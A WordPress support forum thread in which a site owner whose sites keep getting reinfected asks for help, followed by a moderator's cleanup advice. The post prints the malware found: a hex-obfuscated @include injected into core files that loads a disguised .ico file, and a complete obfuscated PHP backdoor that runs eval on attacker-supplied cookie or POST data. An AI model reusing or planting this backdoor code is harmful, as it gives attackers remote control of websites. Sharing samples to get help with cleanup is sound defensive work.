Support » Fixing WordPress » WordPress got hacked again and again

  • My wordpress site was hacked again and again. Some code and files were added to my site. I found this code in index.php and wp-settings.php

    /*d6c27*/
    
    @include "\x2fv\x61r\x2fw\x77w\x2fs\x75q\x69n\x67h\x61i\x2ec\x6fm\x2fh\x74d\x6fc\x73/\x77p\x2da\x64m\x69n\x2fc\x73s\x2ff\x61v\x69c\x6fn\x5ff\x63c\x368\x34.\x69c\x6f";
    
    /*d6c27*/

    Some files with some random names like p10lc5hy.php were found by WordFence.

    The content of p10lc5hy.php

    <?php
    $pnxcmeo = 'x#-i0H86k\'_5tugpyocs9l31brdvemf4n2*a';$krgkmwd = Array();$krgkmwd[] = $pnxcmeo[5].$pnxcmeo[34];$krgkmwd[] = $pnxcmeo[1];$krgkmwd[] = $pnxcmeo[33].$pnxcmeo[28].$pnxcmeo[31].$pnxcmeo[23].$pnxcmeo[11].$pnxcmeo[23].$pnxcmeo[31].$pnxcmeo[4].$pnxcmeo[2].$pnxcmeo[18].$pnxcmeo[33].$pnxcmeo[26].$pnxcmeo[7].$pnxcmeo[2].$pnxcmeo[31].$pnxcmeo[7].$pnxcmeo[30].$pnxcmeo[24].$pnxcmeo[2].$pnxcmeo[24].$pnxcmeo[24].$pnxcmeo[6].$pnxcmeo[26].$pnxcmeo[2].$pnxcmeo[20].$pnxcmeo[35].$pnxcmeo[6].$pnxcmeo[11].$pnxcmeo[22].$pnxcmeo[4].$pnxcmeo[11].$pnxcmeo[18].$pnxcmeo[23].$pnxcmeo[18].$pnxcmeo[20].$pnxcmeo[23];$krgkmwd[] = $pnxcmeo[18].$pnxcmeo[17].$pnxcmeo[13].$pnxcmeo[32].$pnxcmeo[12];$krgkmwd[] = $pnxcmeo[19].$pnxcmeo[12].$pnxcmeo[25].$pnxcmeo[10].$pnxcmeo[25].$pnxcmeo[28].$pnxcmeo[15].$pnxcmeo[28].$pnxcmeo[35].$pnxcmeo[12];$krgkmwd[] = $pnxcmeo[28].$pnxcmeo[0].$pnxcmeo[15].$pnxcmeo[21].$pnxcmeo[17].$pnxcmeo[26].$pnxcmeo[28];$krgkmwd[] = $pnxcmeo[19].$pnxcmeo[13].$pnxcmeo[24].$pnxcmeo[19].$pnxcmeo[12].$pnxcmeo[25];$krgkmwd[] = $pnxcmeo[35].$pnxcmeo[25].$pnxcmeo[25].$pnxcmeo[35].$pnxcmeo[16].$pnxcmeo[10].$pnxcmeo[29].$pnxcmeo[28].$pnxcmeo[25].$pnxcmeo[14].$pnxcmeo[28];$krgkmwd[] = $pnxcmeo[19].$pnxcmeo[12].$pnxcmeo[25].$pnxcmeo[21].$pnxcmeo[28].$pnxcmeo[32];$krgkmwd[] = $pnxcmeo[15].$pnxcmeo[35].$pnxcmeo[18].$pnxcmeo[8];foreach ($krgkmwd[7]($_COOKIE, $_POST) as $xlngb => $jzthj){function icoxp($krgkmwd, $xlngb, $onqvmzo){return $krgkmwd[6]($krgkmwd[4]($xlngb . $krgkmwd[2], ($onqvmzo / $krgkmwd[8]($xlngb)) + 1), 0, $onqvmzo);}function bgfjw($krgkmwd, $hnowtlt){return @$krgkmwd[9]($krgkmwd[0], $hnowtlt);}function inultl($krgkmwd, $hnowtlt){$ohkvz = $krgkmwd[3]($hnowtlt) % 3;if (!$ohkvz) {eval($hnowtlt[1]($hnowtlt[2]));exit();}}$jzthj = bgfjw($krgkmwd, $jzthj);inultl($krgkmwd, $krgkmwd[5]($krgkmwd[1], $jzthj ^ icoxp($krgkmwd, $xlngb, $krgkmwd[8]($jzthj))));}

    From WordFence:
    File appears to be malicious: wp-admin/css/favicon_fcc684.ico
    Type: File

    Sometimes they broke my site. I deleted all the files found by WordFence, reinstall WordPress, scan my ubuntu server with Clamav. This fixed the site, but after one day or two, the same thing happens again. I’m afraid it might be the server that’s been hacked, because almost all my WordPress websites on the server have the same problems, but I don’t know how they did it. I tried to change the root password but didn’t help. What can I do?

    • This topic was modified 1 year, 7 months ago by  zacklive.
Viewing 3 replies - 1 through 3 (of 3 total)
  • Moderator t-p

    (@t-p)

    – You need to start working your way through the resources on this page.
    – Other things you should do:

    • Change passwords for all users, especially Administrators and Editors.
    • If you upload files to your site via FTP, change your FTP password.
    • Re-install the latest version of WordPress.
    • Make sure all of your plugins and themes are up-to-date.
    • Update your security keys.

    – Additional Resources:
    http://ottopress.com/2009/hacked-wordpress-backdoors/
    Hardening WordPress
    – If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Off hand, couple of names that come to mind are Sucuri and Wordfence.

    Hey Zack, did you ever find out how they were getting in? I have a MediaTemple Gridserver account with a few WordPress sites that keep getting hacked. It’s the same hack as you mentioned with the php code injection with the @include reference to an .ico file.

    I opened a new Gridserver account, all new strong-level passwords, new WordPress & plugin installs, only copied over the WordPress database which the scanner says is clean. The new hosting account was hacked again after 48 short hours.

    I operate other hosting accounts with non-Wordpress sites & those aren’t getting hacked. Just the WordPress ones.

    Moderator t-p

    (@t-p)

    @melhergui,

    It has been over 5 months since the OP posted.

    Please do not jump into other topics. If the troubleshooting already posted made no difference for you, then, as per the Forum Welcome, please post your own topic.

    I’m archiving your post.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘WordPress got hacked again and again’ is closed to new replies.